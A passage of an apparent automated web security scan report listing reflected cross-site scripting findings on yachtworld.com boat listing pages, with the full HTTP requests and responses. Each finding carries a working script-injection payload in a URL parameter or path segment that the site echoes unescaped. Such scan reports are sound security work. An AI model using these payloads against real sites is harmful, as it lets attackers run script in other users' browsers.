Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
f="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States833dd"><script>alert(1)</script>f4cd42b8d3c&boat_id=2305157">
...[SNIP]...

3.100. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28dc4"><script>alert(1)</script>1263c813c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States?28dc4"><script>alert(1)</script>1263c813c97=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:33 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:33 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&28dc4"><script>alert(1)</script>1263c813c97=1&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States&boat_id=2305157">
...[SNIP]...

3.101. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37913"><script>alert(1)</script>074a64c253c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo37913"><script>alert(1)</script>074a64c253c/Puerto-Rico HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
w" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo37913"><script>alert(1)</script>074a64c253c/Puerto-Rico&boat_id=2152119">
...[SNIP]...

3.102. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f752b"><script>alert(1)</script>40b5af5053c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Ricof752b"><script>alert(1)</script>40b5af5053c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5